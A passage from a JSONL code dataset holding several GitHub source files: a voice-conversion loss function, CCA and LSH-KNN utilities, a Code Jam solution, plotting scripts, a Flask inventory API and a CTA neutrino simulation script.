mel_mask) / torch.sum(mel_mask)\n\n if self.predict_spectrogram:\n recon_loss_post = (self.L1Loss(post_output, spc_target) * spc_mask).sum() / spc_mask.sum()\n else:\n recon_loss_post = (self.L1Loss(post_output, mel_target) * mel_mask).sum() / torch.sum(mel_mask)\n \n stop_loss = torch.sum(self.BCEWithLogitsLoss(predicted_stop, stop_target) * stop_mask) / torch.sum(stop_mask)\n\n\n if self.contr_w == 0.:\n contrast_loss = torch.tensor(0.).cuda()\n else:\n # contrastive mask #\n contrast_mask1 = get_mask_from_lengths(text_lengths).unsqueeze(2).expand(-1, -1, mel_hidden.size(1)) # [B, text_len] -> [B, text_len, T/r]\n contrast_mask2 = get_mask_from_lengths(text_lengths).unsqueeze(1).expand(-1, text_hidden.size(1), -1) # [B, T/r] -> [B, text_len, T/r]\n contrast_mask = (contrast_mask1 & contrast_mask2).float()\n text_hidden_normed = text_hidden / (torch.norm(text_hidden, dim=2, keepdim=True) + eps)\n mel_hidden_normed = mel_hidden / (torch.norm(mel_hidden, dim=2, keepdim=True) + eps)\n\n # (x - y) ** 2 = x ** 2 + y ** 2 - 2xy\n distance_matrix_xx = torch.sum(text_hidden_normed ** 2, dim=2, keepdim=True) #[batch_size, text_len, 1]\n distance_matrix_yy = torch.sum(mel_hidden_normed ** 2, dim=2)\n distance_matrix_yy = distance_matrix_yy.unsqueeze(1) #[batch_size, 1, text_len]\n\n #[batch_size, text_len, text_len]\n distance_matrix_xy = torch.bmm(text_hidden_normed, torch.transpose(mel_hidden_normed, 1, 2)) \n distance_matrix = distance_matrix_xx + distance_matrix_yy - 2 * distance_matrix_xy\n \n TTEXT = distance_matrix.size(1)\n hard_alignments = torch.eye(TTEXT).cuda()\n contrast_loss = hard_alignments * distance_matrix + \\\n (1. - hard_alignments) * torch.max(1. - distance_matrix, torch.zeros_like(distance_matrix))\n\n contrast_loss = torch.sum(contrast_loss * contrast_mask) / torch.sum(contrast_mask)\n\n n_speakers = speaker_logit_from_mel_hidden.size(2)\n TTEXT = speaker_logit_from_mel_hidden.size(1)\n n_symbols_plus_one = text_logit_from_mel_hidden.size(2)\n\n # speaker classification loss #\n speaker_encoder_loss = nn.CrossEntropyLoss()(speaker_logit_from_mel, speaker_target)\n _, predicted_speaker = torch.max(speaker_logit_from_mel,dim=1)\n speaker_encoder_acc = ((predicted_speaker == speaker_target).float()).sum() / float(speaker_target.size(0))\n\n speaker_logit_flatten = speaker_logit_from_mel_hidden.reshape(-1, n_speakers) # -> [B* TTEXT, n_speakers]\n _, predicted_speaker = torch.max(speaker_logit_flatten, dim=1)\n speaker_target_flatten = speaker_target.unsqueeze(1).expand(-1, TTEXT).reshape(-1)\n speaker_classification_acc = ((predicted_speaker == speaker_target_flatten).float() * text_mask.reshape(-1)).sum() / text_mask.sum()\n loss = self.CrossEntropyLoss(speaker_logit_flatten, speaker_target_flatten)\n\n speaker_classification_loss = torch.sum(loss * text_mask.reshape(-1)) / torch.sum(text_mask)\n\n # text classification loss #\n text_logit_flatten = text_logit_from_mel_hidden.reshape(-1, n_symbols_plus_one)\n text_target_flatten = text_target.reshape(-1)\n _, predicted_text = torch.max(text_logit_flatten, dim=1)\n text_classification_acc = ((predicted_text == text_target_flatten).float()*text_mask_plus_one.reshape(-1)).sum()/text_mask_plus_one.sum()\n loss = self.CrossEntropyLoss(text_logit_flatten, text_target_flatten)\n text_classification_loss = torch.sum(loss * text_mask_plus_one.reshape(-1)) / torch.sum(text_mask_plus_one)\n\n # speaker adversival loss #\n flatten_target = 1. / n_speakers * torch.ones_like(speaker_logit_flatten)\n loss = self.MSELoss(F.softmax(speaker_logit_flatten, dim=1), flatten_target)\n mask = text_mask.unsqueeze(2).expand(-1,-1, n_speakers).reshape(-1, n_speakers)\n\n if self.ce_loss:\n speaker_adversial_loss = - speaker_classification_loss\n else:\n speaker_adversial_loss = torch.sum(loss * mask) / torch.sum(mask)\n \n loss_list = [recon_loss, recon_loss_post, stop_loss,\n contrast_loss, speaker_encoder_loss, speaker_classification_loss,\n text_classification_loss, speaker_adversial_loss]\n \n acc_list = [speaker_encoder_acc, speaker_classification_acc, text_classification_acc]\n \n \n combined_loss1 = recon_loss + recon_loss_post + stop_loss + self.contr_w * contrast_loss + \\\n self.spenc_w * speaker_encoder_loss + self.texcl_w * text_classification_loss + \\\n self.spadv_w * speaker_adversial_loss\n\n combined_loss2 = self.spcla_w * speaker_classification_loss\n \n return loss_list, acc_list, combined_loss1, combined_loss2\n\n","repo_name":"jxzhanggg/nonparaSeq2seqVC_code","sub_path":"pre-train/model/loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":8723,"program_lang":"python","lang":"en","doc_type":"code","stars":246,"dataset":"github-code","pt":"61"} +{"seq_id":"29100819775","text":"\nimport numpy as np\nimport tensorflow as tf\n\neps_eig = 1e-6\n\ndef linCCA(H1, H2, dim, rcov1, rcov2):\n\n\tN, d1 = H1.shape\n\t_, d2 = H2.shape\n\n\t# Remove mean.\n\tm1 = np.mean(H1, axis=0, keepdims=True)\n\tH1 = H1 - np.tile(m1, [N,1])\n\n\tm2 = np.mean(H2, axis=0, keepdims=True)\n\tH2 = H2 - np.tile(m2, [N,1])\n\n\tS11 = np.matmul(H1.transpose(), H1) / (N-1) + rcov1 * np.eye(d1)\n\tS22 = np.matmul(H2.transpose(), H2) / (N-1) + rcov2 * np.eye(d2)\n\tS12 = np.matmul(H1.transpose(), H2) / (N-1)\n\n\tE1, V1 = np.linalg.eig(S11)\n\tE2, V2 = np.linalg.eig(S22)\n\n\t# For numerical stability.\n\tidx1 = np.where(E1>eps_eig)[0]\n\tE1 = E1[idx1]\n\tV1 = V1[:, idx1]\n\n\tidx2 = np.where(E2>eps_eig)[0]\n\tE2 = E2[idx2]\n\tV2 = V2[:, idx2]\n\n\tK11 = np.matmul( np.matmul(V1, np.diag(np.reciprocal(np.sqrt(E1)))), V1.transpose())\n\tK22 = np.matmul( np.matmul(V2, np.diag(np.reciprocal(np.sqrt(E2)))), V2.transpose())\n\tT = np.matmul( np.matmul(K11, S12), K22)\n\t# print(T)\n\tU, E, V = np.linalg.svd(T, full_matrices=False)\n\tV = V.transpose()\n\n\tA = np.matmul(K11, U[:, 0:dim])\n\tB = np.matmul(K22, V[:, 0:dim])\n\tE = E[0:dim]\n\n\treturn A, B, m1, m2, E\n\n\ndef CanonCorr(H1, H2, N, d1, d2, dim, rcov1, rcov2):\n\n\t# Remove mean.\n\tm1 = tf.reduce_mean(H1, axis=0, keep_dims=True)\n\tH1 = tf.subtract(H1, m1)\n\n\tm2 = tf.reduce_mean(H2, axis=0, keep_dims=True)\n\tH2 = tf.subtract(H2, m2)\n\n\tS11 = tf.matmul(tf.transpose(H1), H1) / (N-1) + rcov1 * tf.eye(d1)\n\tS22 = tf.matmul(tf.transpose(H2), H2) / (N-1) + rcov2 * tf.eye(d2)\n\tS12 = tf.matmul(tf.transpose(H1), H2) / (N-1)\n\n\tE1, V1 = tf.self_adjoint_eig(S11)\n\tE2, V2 = tf.self_adjoint_eig(S22)\n\n\t# For numerical stability.\n\tidx1 = tf.where(E1>eps_eig)[:,0]\n\tE1 = tf.gather(E1, idx1)\n\tV1 = tf.gather(V1, idx1, axis=1)\n\n\tidx2 = tf.where(E2>eps_eig)[:,0]\n\tE2 = tf.gather(E2, idx2)\n\tV2 = tf.gather(V2, idx2, axis=1)\n\n\tK11 = tf.matmul(tf.matmul(V1, tf.diag(tf.reciprocal(tf.sqrt(E1)))), tf.transpose(V1))\n\tK22 = tf.matmul(tf.matmul(V2, tf.diag(tf.reciprocal(tf.sqrt(E2)))), tf.transpose(V2))\n\tT = tf.matmul(tf.matmul(K11, S12), K22)\n\n\t# Eigenvalues are sorted in increasing order.\n\tE3, U = tf.self_adjoint_eig(tf.matmul(T, tf.transpose(T)))\n\tidx3 = tf.where(E3 > eps_eig)[:, 0]\n\t# This is the thresholded rank.\n\tdim_svd = tf.cond(tf.size(idx3) < dim, lambda: tf.size(idx3), lambda: dim)\n\n\treturn tf.reduce_sum(tf.sqrt(E3[-dim_svd:])), E3, dim_svd\n\n\ndef inf_CCA(self, y1, y2, mode, est_CCA=False, dim = -1):\n\tglobal debug_mode\n\tdebug_mode = self.selfargs.debug_mode\n\n\tif est_CCA:\n\t\tself.A_cca, self.B_cca, self.m1_cca, self.m2_cca, _= linCCA(y1, y2, dim, rcov1= 1e-4, rcov2=1e-4)\n\n\tPhi_cca1 = np.matmul(y1 - self.m1_cca, self.A_cca)\n\tPhi_cca2 = np.matmul(y2 - self.m2_cca, self.B_cca)\n\n\tif mode == 'tr':\n\t\tself.Phi_tr_cca1 = Phi_cca1\n\t\tself.Phi_tr_cca2 = Phi_cca2\n\telif mode == 'tu':\n\t\tself.Phi_tu_cca1 = Phi_cca1\n\t\tself.Phi_tu_cca2 = Phi_cca2\n\telif mode == 'te':\n\t\tself.Phi_te_cca1 = Phi_cca1\n\t\tself.Phi_te_cca2 = Phi_cca2\n\telse:\n\t\traise ValueError('not a valid inference mode in inf_cca()')\n\treturn Phi_cca1, Phi_cca2\n\n\ndef PCCA(H1, H2, dim, rcov1, rcov2):\n\n\tN, d1 = H1.shape\n\t_, d2 = H2.shape\n\n\t# Remove mean.\n\tmu1 = np.mean(H1, axis=0, keepdims=True)\n\tH1 = H1 - np.tile(mu1, [N,1])\n\n\tmu2 = np.mean(H2, axis=0, keepdims=True)\n\tH2 = H2 - np.tile(mu2, [N,1])\n\n\tS11 = np.matmul(H1.transpose(), H1) / (N-1) + rcov1 * np.eye(d1)\n\tS22 = np.matmul(H2.transpose(), H2) / (N-1) + rcov2 * np.eye(d2)\n\tS12 = np.matmul(H1.transpose(), H2) / (N-1)\n\n\tE1, V1 = np.linalg.eig(S11)\n\tE2, V2 = np.linalg.eig(S22)\n\n\t# For numerical stability.\n\tidx1 = np.where(E1>eps_eig)[0]\n\tE1 = E1[idx1]\n\tV1 = V1[:, idx1]\n\n\tidx2 = np.where(E2>eps_eig)[0]\n\tE2 = E2[idx2]\n\tV2 = V2[:, idx2]\n\n\tK11 = np.matmul( np.matmul(V1, np.diag(np.reciprocal(np.sqrt(E1)))), V1.transpose())\n\tK22 = np.matmul( np.matmul(V2, np.diag(np.reciprocal(np.sqrt(E2)))), V2.transpose())\n\tT = np.matmul( np.matmul(K11, S12), K22)\n\t# print(T)\n\tU, E, V = np.linalg.svd(T, full_matrices=False)\n\tV = V.transpose()\n\n\tA = np.matmul(K11, U[:, 0:dim])\n\tB = np.matmul(K22, V[:, 0:dim])\n\tE = E[0:dim]\n\n\tM1 = M2 = np.diag(np.sqrt(E))\n\tW1 = np.matmul(S11, np.matmul(A, M1))\n\tW2 = np.matmul(S22, np.matmul(B, M2))\n\n\tPsi1 = S11 - np.matmul(W1, W1.transpose())\n\tPsi1 = .5 * (Psi1 + Psi1.transpose())\n\tPsi2 = S22 - np.matmul(W2, W2.transpose())\n\tPsi2 = .5 * (Psi2 + Psi2.transpose())\n\n\treturn W1.transpose(), W2.transpose(), mu1, mu2, Psi1, Psi2, E\n\n","repo_name":"Karami-m/Deep-Probabilistic-Multi-View","sub_path":"util/CCA.py","file_name":"CCA.py","file_ext":"py","file_size_in_byte":4349,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"25432146537","text":"from typing import Dict\nimport numpy as np\nimport random\nimport pandas as pd\nfrom tqdm import tqdm\nfrom collections import Counter, OrderedDict\n\n\nclass LSH:\n \"\"\"\n Implementation of KNN using LSH (Locality Sensitive Hashing).\n Uses cosine similarity to compute distance between vectors.\n \"\"\"\n\n def __init__(self, X: np.array, y, num_hps: int = 5, k: int = 11):\n\n self.set_seed()\n\n self.X: np.array = X\n self.y = y\n self.hash_table: Dict = {}\n self.num_hps: int = num_hps\n self.k = k\n\n # Generate hyperplanes\n self.hps: np.array = np.array(\n [np.random.normal(0, 1, X.shape[1]) for _ in range(self.num_hps)]\n )\n\n def set_seed(self):\n \"\"\"\n Setting the random seed for better interpretability\n \"\"\"\n np.random.seed(0)\n random.seed(0)\n\n def _hash_func(self, vec):\n \"\"\"\n Hash function to generate keys\n \"\"\"\n return tuple(np.sign(np.dot(self.hps, vec)))\n\n def _create_hash_table(self):\n \"\"\"\n Generate hash table putting points in various buckets\n \"\"\"\n for idx, vec in tqdm(enumerate(self.X), total=self.X.shape[0]):\n key = self._hash_func(vec)\n\n if key not in self.hash_table.keys():\n self.hash_table[key] = []\n else:\n self.hash_table[key].append(idx)\n\n def _cos_sim(self, v1, v2):\n \"\"\"\n Compute the cosine similarity between 2 vectors\n \"\"\"\n return np.dot(v1, v2) / (np.linalg.norm(v1) * np.linalg.norm(v2))\n\n def fit_transform(self):\n \"\"\"\n The training phase for generating hash table\n \"\"\"\n self._create_hash_table()\n\n def _majority_voting(self, classes):\n \"\"\"\n Does majority voting among nearest neighbor\n predicted classes to get the final prediction\n \"\"\"\n max_count = max(list(classes.values()))\n\n preds = []\n\n for k, v in classes.items():\n if v == max_count:\n preds.append(k)\n\n return sorted(preds)[0]\n\n def transform(self, X_test):\n \"\"\"\n Make predictions on the test data\n \"\"\"\n preds = []\n\n for idx, vec in tqdm(enumerate(X_test), total=X_test.shape[0]):\n key = self._hash_func(vec)\n\n # Getting all the neighbors from hash table\n neigh_idxs = self.hash_table[key]\n\n # Computing cosine similarity for each vector\n cos_sims = {}\n\n for idx in tqdm(neigh_idxs):\n v = self.X[idx]\n cos_sims[idx] = self._cos_sim(v, vec)\n\n # Getting the nearest neighbours\n nearest_nn_idxs = np.array(\n list(\n OrderedDict(\n sorted(cos_sims.items(), key=lambda x: x[1], reverse=True)\n ).keys()\n )[: self.k]\n )\n\n preds.append(self._majority_voting(Counter(self.y[nearest_nn_idxs])))\n\n return preds\n","repo_name":"Abhiswain97/ML-from-scratch","sub_path":"classification/KNN_LSH.py","file_name":"KNN_LSH.py","file_ext":"py","file_size_in_byte":3045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23462921401","text":"# Python 3\n\n# q = {'1': 0, 'i': 1, 'j': 2, 'k': 3}\n# qb = ['1', 'i', 'j', 'k', '-1', '-i', '-j', '-k']\n\n\ndef transform(a, b):\n \"\"\"Takes string arguments and returns a string\"\"\"\n t = (a[0] == '-') + (b[0] == '-')\n l = a[-1]\n r = b[-1]\n if l == '1':\n ret = b[-1]\n elif r == '1':\n ret = a[-1]\n elif l == r:\n ret = '1'\n t += 1\n elif l == 'i':\n if r == 'j':\n ret = 'k'\n if r == 'k':\n ret = 'j'\n t += 1\n elif l == 'j':\n if r == 'k':\n ret = 'i'\n if r == 'i':\n ret = 'k'\n t += 1\n elif l == 'k':\n if r == 'i':\n ret = 'j'\n if r == 'j':\n ret = 'i'\n t += 1\n if t % 2:\n ret = '-' + ret\n return ret\n\n\ndef combine(l):\n ret = '1'\n for x in l:\n ret = transform(ret, x)\n return ret\n\n\nt = int(input())\nfor tau in range(t):\n l, x = tuple(map(int, input().split()))\n s = list(input() * x)\n if combine(s) != '-1':\n print(\"Case #\" + str(tau+1) + \": NO\")\n continue\n while len(s) >= 3 and s[0] != 'i':\n s = [transform(s[0], s[1])] + s[2:]\n while len(s) >= 3 and s[-1] != 'k':\n s = s[:-2] + [transform(s[-2], s[-1])]\n if s[0] == 'i' and s[-1] == 'k':\n print(\"Case #\" + str(tau+1) + \": YES\")\n else:\n print(\"Case #\" + str(tau+1) + \": NO\")\n\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_157/800.py","file_name":"800.py","file_ext":"py","file_size_in_byte":1403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"54839868","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nRun this from the root dir folder (the one with the load and IO folders in)\nCreated on Mon Oct 29 11:41:22 2018\n\n@author: mellis\n\n\"\"\"\nimport os\nfrom multiprocessing import Pool\nimport matplotlib.pyplot as plt\nimport gc\n\nfrom IO import Folders as fold\nfrom PLOT import Plot\n\n###############\n# Warning if root folder is set to a folder with other folders in it will crawl \n# the other folders in search of inputs to plot!\nrootFolder = [\"\",\n \"/home/oem/Data/CTMQC/SMALL_NUCL_DT\",\n #\"/scratch/mellis/flavoured-cptk/200Rep_2mol\",\n \"\",\n ]\n\n\n# folders = folders[:1]\nplotting_parameters = [\"|C|^2\", \"norm\"]\nreplicas = 'all'\nplot = True\nnum_proc = 'auto'\nmin_time = 0\nmax_time = 'all'\n#######################################################\n\nfolders = []\nfor rootfolder in rootFolder:\n for dpath, _, files in os.walk(rootfolder):\n if os.path.isdir(dpath):\n possFolder = os.path.abspath(dpath)\n if 'run.inp' in files:\n folders.append(possFolder)\n continue\n\nif not folders:\n print(\"\\t\\t#####################\")\n print(\"\\nSorry I can't find any folders to plot!\")\n print(\"Make sure the run.inp file is in the required folder\")\n\n\ndef do_1_folder(folder, plotting_parameters, replicas, plot):\n p = Plot(plot_params=plotting_parameters,\n folder=folder,\n reps=replicas,\n plot=plot,\n minTime=min_time,\n maxTime=max_time,\n )\n return p\n\n\ndef do_1_fold_PL(folder):\n p = Plot(plot_params=plotting_parameters,\n folder=folder,\n reps=replicas,\n plot=plot,\n minTime=min_time,\n maxTime=max_time)\n return p\n\nif num_proc == 'auto':\n num_proc = len(folders)\n\nif plot:\n all_p = []\n for f in folders:\n p = do_1_fold_PL(f)\n all_p.append(p)\n print(\"Done %s\" % f)\nelse:\n if num_proc > 21:\n num_proc = 21\n print(\"Num Proc = \", num_proc)\n if num_proc > 1:\n pool = Pool(num_proc)\n if __name__ == '__main__':\n all_p = pool.map(do_1_fold_PL, folders)\n else:\n all_p = [do_1_fold_PL(folders[0])]\n\n","repo_name":"95ellismle/Plotting-CP2K","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9911591733","text":"#-*-coding:utf-8-*-\nfrom flask import Flask,sessions,request,make_response,jsonify\nimport log\nfrom db import my_md5,PymysqlPool\nfrom code1 import ResponseCode,ResponseMessage\nimport datetime\nfrom user_mode.public import *\nimport re\n\n\n\n\ndef t_goods(request_body,path):\n mysql=PymysqlPool()\n shop_id=request_body.get('id')\n if path=='/select_goods':\n status = request_body.get('status')\n page = request_body.get('page',None)\n pageSize = request_body.get('pageSize',None)\n if page=='' or page==None or pageSize=='' or pageSize==None:\n page='1'\n pageSize = '999999999999'\n start=int(int(page)-1)*int(pageSize)\n stop=pageSize\n limit=\" order by id desc limit {0}, {1}\".format(start,stop)\n select_sql=\"select code_id,shop_id,u_code,goods_id,name,s_code,inventory_quantity,seling_price,unit_pinlei,unit,s_photo,min_num,threshold_remind,status from t_goods where shop_id='{0}' and status='{1}' \" \\\n \"\".format(shop_id,status)\n list1=['name','start_seling_price','end_seling_price','inventory_quantity']\n tmp_sql1=\"\"\n tmp_sql=\"\"\n for i in request_body:\n if i in list1:\n print(request_body.get(i))\n if request_body.get(i)=='' or request_body.get(i)==None:\n continue\n elif i=='name':\n tmp_sql=\" and (name like '%{0}%' or code_id like '%{0}%' or s_code like '%{0}%' or goods_id like '%{0}%') \".format(request_body.get(i))\n elif i=='start_seling_price':\n tmp_sql=\" and seling_price >='{0}'\".format(date_s_date(request_body.get(i),'GMT','day'))\n elif i=='end_seling_price':\n tmp_sql=\" and seling_price <='{0}'\".format(date_s_date(request_body.get(i),'GMT','day'))\n tmp_sql1=tmp_sql1+tmp_sql\n select_sql1=select_sql+tmp_sql1+limit\n select_sql3=\"select count(*) as total from t_goods where shop_id='{0}' and status='{1}' \" \\\n \"\".format(shop_id,status)\n select_sql2=select_sql3+tmp_sql1\n log.LOG.debug('api:{0},sql:{1}'.format(path,select_sql2))\n resluts=mysql.getAll(select_sql1)\n total_sql=mysql.getAll(select_sql2)[0]['total']\n res = dict(code=ResponseCode.SUCCESS,\n msg='查询成功',\n payload=dict(page=start,\n total=total_sql,\n pageSize=stop,\n pageData=resluts,\n key='goods_id'))\n if path=='/insert_goods':\n print(request_body)\n shop_id = request_body.get('id')\n user_id = request_body.get('name')\n user_name = request_body.get('name')\n name = request_body.get('name')\n inventory_quantity = request_body.get('inventory_quantity')\n seling_price = request_body.get('seling_price')\n min_num = request_body.get('min_num')\n unit = request_body.get('unit')\n status = request_body.get('status')\n list1=['code_id','s_code','u_code','s_link','s_photo','type_id','unit_pinlei','threshold_remind']\n list2,list3=insert_sql1(list1,request_body)\n print(list2)\n print(list3)\n select_1 = \"select max(goods_id) as goods_id from t_goods where shop_id='{0}'\".format(shop_id)\n res111 = mysql.getAll(select_1)\n print(res111)\n if res111[0]['goods_id'] == '' or res111[0]['goods_id'] == None:\n goods_id = '10000'\n else:\n goods_id = shop_id+'_'+str(int(res111[0]['goods_id'].split('_')[1])+1)\n print(goods_id)\n date=get_date(0,2)\n insert_sql=\"insert into t_goods(goods_id,shop_id,name,inventory_quantity,seling_price,min_num,unit,status,create_time,update_time\" \\\n \"{0}) values('{1}','{2}','{3}','{4}','{5}','{6}','{7}','{8}','{9}','{10}',{11})\".format(list2,goods_id,shop_id,name,inventory_quantity,\n seling_price,min_num,unit,status,date,date,list3)\n print(insert_sql)\n m10=mysql.insert(insert_sql)\n if m10==False:\n res = dict(code=ResponseCode.FAIL,\n msg='SQL-error',\n payload=None\n )\n msg=\"api:{0},error_sql:{1},sql错误\".format(path,insert_sql)\n log.LOG.error(msg)\n return res\n #####插入流水表完成####\n insert_sql111 = \"insert into t_goods_list(goods_id,shop_id,code_id,name,unit,user_id,user_name,Operation_type,create_time) values('{1}_{0}','{1}',\" \\\n \"'{2}','{3}','{4}','{5}','{6}','{7}','{8}')\".format(goods_id, shop_id, '', name, unit,\n user_id, user_name, '进货', date)\n m10=mysql.insert(insert_sql111)\n if m10==False:\n res = dict(code=ResponseCode.FAIL,\n msg='SQL-error',\n payload=None\n )\n msg=\"api:{0},error_sql:{1},sql错误,插入流水表\".format(path,insert_sql111)\n log.LOG.error(msg)\n res = dict(code=ResponseCode.SUCCESS,\n msg='新增成功',\n payload=None)\n if path=='/update_goods':\n shop_id=request_body.get('id')\n user_id=request_body.get('user_id')\n user_name=request_body.get('user_name')\n goods_id=request_body.get('goods_id')\n name=request_body.get('name')\n inventory_quantity=request_body.get('inventory_quantity','')\n min_num=request_body.get('min_num','')\n seling_price=request_body.get('seling_price','')\n type_id=request_body.get('type_id','')\n unit_pinlei=request_body.get('unit_pinlei','')\n unit=request_body.get('unit','')\n threshold_remind=request_body.get('threshold_remind','')\n code_id=request_body.get('code_id','')\n date=get_date(0,2)\n select1=\"select id,goods_id,shop_id,name,inventory_quantity,min_num,\" \\\n \"seling_price,type_id,unit_pinlei,unit,threshold_remind from t_goods where goods_id='{0}'\".format(goods_id)\n mm1=mysql.getAll(select1)\n keys = list(mm1[0].keys())\n keys.remove('id')\n keys.remove('shop_id')\n keys.remove('goods_id')\n print(keys)\n for i in range(0,len(keys)):\n mx=mm1[0].get(keys[i])\n mx1=request_body.get(keys[i])\n if mx1==None:\n continue\n else:\n if mx!=mx1:\n if keys[i]=='inventory_quantity':\n insert1=\"insert into t_goods_inventory_flow(shop_id,code_id,goods_id,inventory_begin,\" \\\n \"inventory_after,inventory_list,create_time,name,user_id,user_name) values(\" \\\n \"'{0}','{1}','{2}','{3}','{4}','{5}','{6}','{7}','{8}','{9}')\".format(shop_id,code_id,goods_id,mx,mx1,int(mx1)-int(mx),date,name,user_id,user_name)\n else:\n Operation_type='将{0}由{1}修改成{2}'.format(keys[i],mx,mx1)\n Operation_type=re.sub('name','商品名称:',Operation_type)\n Operation_type=re.sub('min_num','库存下线:',Operation_type)\n Operation_type=re.sub('seling_price','销售价格:',Operation_type)\n Operation_type=re.sub('type_id','商品分类:',Operation_type)\n Operation_type=re.sub('unit_pinlei','商品品类:',Operation_type)\n Operation_type=re.sub('unit','商品单位:',Operation_type)\n Operation_type=re.sub('threshold_remind','阀值提醒:',Operation_type)\n insert1=\"insert into t_goods_update_table(goods_id,shop_id,code_id,create_time,user_name,Operation_type,name) values(\" \\\n \"'{0}','{1}','{2}','{3}','{4}','{5}','{6}')\".format(goods_id,shop_id,code_id,date,user_name,Operation_type,name)\n print(insert1)\n m10=mysql.insert(insert1)\n if m10 == False:\n res = dict(code=ResponseCode.FAIL,\n msg='SQL-error',\n payload=None\n )\n msg = \"api:{0},error_sql:{1},sql错误\".format(path, insert1)\n log.LOG.error(msg)\n return res\n update_sql=\"update t_goods set name='{0}',inventory_quantity='{1}',min_num='{2}',seling_price='{3}',type_id='{4}',unit_pinlei='{5}',\" \\\n \"unit='{6}',threshold_remind='{7}' where goods_id='{8}' \".format(name,inventory_quantity,min_num,seling_price,type_id,unit_pinlei,\n unit,threshold_remind,goods_id )\n print(update_sql)\n m10=mysql.update(update_sql)\n if m10 == False:\n res = dict(code=ResponseCode.FAIL,\n msg='SQL-error',\n payload=None\n )\n msg = \"api:{0},error_sql:{1},sql错误\".format(path, update_sql)\n log.LOG.error(msg)\n return res\n res = dict(code=ResponseCode.SUCCESS,\n msg='修改成功',\n payload=None)\n mysql.dispose()\n resp = make_response(res)\n resp.headers['Content-Type'] = 'text/json'\n return jsonify(res)\n\n","repo_name":"huaihaizhi1/shouyin_mat","sub_path":"user_mode/t_goods.py","file_name":"t_goods.py","file_ext":"py","file_size_in_byte":9671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26482962760","text":"import gammalib\nimport ctools\nimport cscripts\nimport numpy as np\nfrom ebltable.tau_from_model import OptDepth\nfrom random import uniform\nimport xml_generator as xml\nfrom astropy.io import fits\nfrom xml.dom import minidom\n\ntau = OptDepth.readmodel(model = 'dominguez')\n\ninput_model='NeutrinoAlerts_10000_1e4_transient_100s_MD2014SFR_SC_2.13.out'\n\nimin = 0\nimax = 10000\n\ngam = 2.13\n\nep = 100.\n\nttrans = 100.\n\ntobscta = 600.\n\ndebug = True\nedisp = True\n\ncaldb='prod3b-v1'\nirf='North_z20_average_30m'\n\nhdr = fits.Header()\nhdr['EXTNAME'] = 'Time profile'\nhdr['MJDREFI'] = '59000'\nhdr['MJDREFF'] = '5.0000000000E-01'\nhdr['TIMEUNIT'] = 's'\nhdr['TIMESYS'] = 'TT'\nhdr['TIMEREF'] = 'LOCAL'\n\ndeclination,redshift,A = np.loadtxt(input_model, skiprows=11, unpack=True)\n\nrealsrc=open('nu_src_ts_'+str(int(ttrans))+'s_'+irf+'_'+str(int(tobscta))+'s_'+str(imin+1)+'-'+str(imax)+'.dat', 'w')\nlowrealsrc=open('nu_src_low_ts_'+str(int(ttrans))+'s_'+irf+'_'+str(int(tobscta))+'s_'+str(imin+1)+'-'+str(imax)+'.dat', 'w')\nfakesrc=open('nu_src_fake_'+str(int(ttrans))+'s_'+irf+'_'+str(int(tobscta))+'s_'+str(imin+1)+'-'+str(imax)+'.dat', 'w')\n\nfor i in xrange(imin, imax):\n z = redshift[i]\n if z < 4.:\n delem = uniform(0.,ttrans)\n delal = uniform(20.,80.)\n delrp = uniform(20.,50.)\n tobs = ttrans * (1. + z)\n delobs = delem * (1. + z)\n tsigstart = delobs + delal + delrp\n if tsigstart < tobs:\n lib,doc = xml.CreateLib()\n LCfile = 'LC_nu_'+str(i+1)+'.fits'\n ta=np.empty(500)\n na=np.empty(500)\n for j in xrange(0, 500):\n ta[j]=j\n if ta[j] < tsigstart:\n na[j] = 0.\n elif tsigstart < ta[j] < tobs:\n na[j] = 1.\n else:\n na[j] = 0.\n time = fits.Column(name='TIME', array=ta, format='1D', unit='s')\n norm = fits.Column(name='NORM', array=na, format='1D')\n t = fits.BinTableHDU.from_columns([time, norm],header=hdr)\n t.writeto(LCfile,overwrite=True) \n tsig = tobs - tsigstart\n ra = uniform(0.,360.)\n dec = declination[i]\n ETeV = np.logspace(-2,2.5,45)\n EMeV = ETeV * 1e6\n if z < 0.01:\n atten = 1.\n else:\n atten = np.exp(-1. * tau.opt_depth(z,ETeV))\n prefac = A[i] * 1e-13\n spec = prefac * (ETeV / ep) ** (-gam)\n specebl = spec * atten\n sourcename = 'nu'+str(i+1)\n Filefunction = 'spec_nu_ebl_'+str(i+1)+'.dat'\n np.savetxt(Filefunction, np.column_stack([EMeV,specebl + 1.e-300]))\n speci = xml.addFileFunction(lib, sourcename, type = \"PointSource\", filefun=Filefunction, flux_free=1, flux_value=1., flux_scale=1., flux_max=100000000.0, flux_min=0.0)\n spatial = xml.AddPointLike(doc,ra,dec)\n temporal = xml.AddLCTrans(doc, LCfile, 1.)\n speci.appendChild(spatial)\n speci.appendChild(temporal)\n lib.appendChild(speci)\n \n bkg = xml.addCTAIrfBackground(lib)\n lib.appendChild(bkg)\n\n open('nu_sources_'+str(i+1)+'.xml', 'w').write(doc.toprettyxml(' '))\n \n foutmodel='nu_'+str(i+1)+'_ts.xml'\n \n sim = ctools.ctobssim()\n sim['inmodel'] = 'nu_sources_'+str(i+1)+'.xml'\n sim['caldb'] = caldb\n sim['irf'] = irf\n sim['outevents'] = 'events_nu_'+str(ttrans)+'s_'+irf+'_'+str(int(tobscta))+'s_'+str(i+1)+'.fits'\n sim['ra'] = ra\n sim['dec'] = dec\n sim['rad'] = 5.0\n sim['tmin'] = '2020-05-31T12:00:00'\n sim['tmax'] = '2020-05-31T12:10:00'\n sim['emin'] = 0.02\n sim['emax'] = 199.0\n sim['maxrate'] = 1.0e9\n sim['debug'] = debug\n sim['edisp'] = edisp\n sim.execute()\n\n like = ctools.ctlike()\n like['inobs'] = 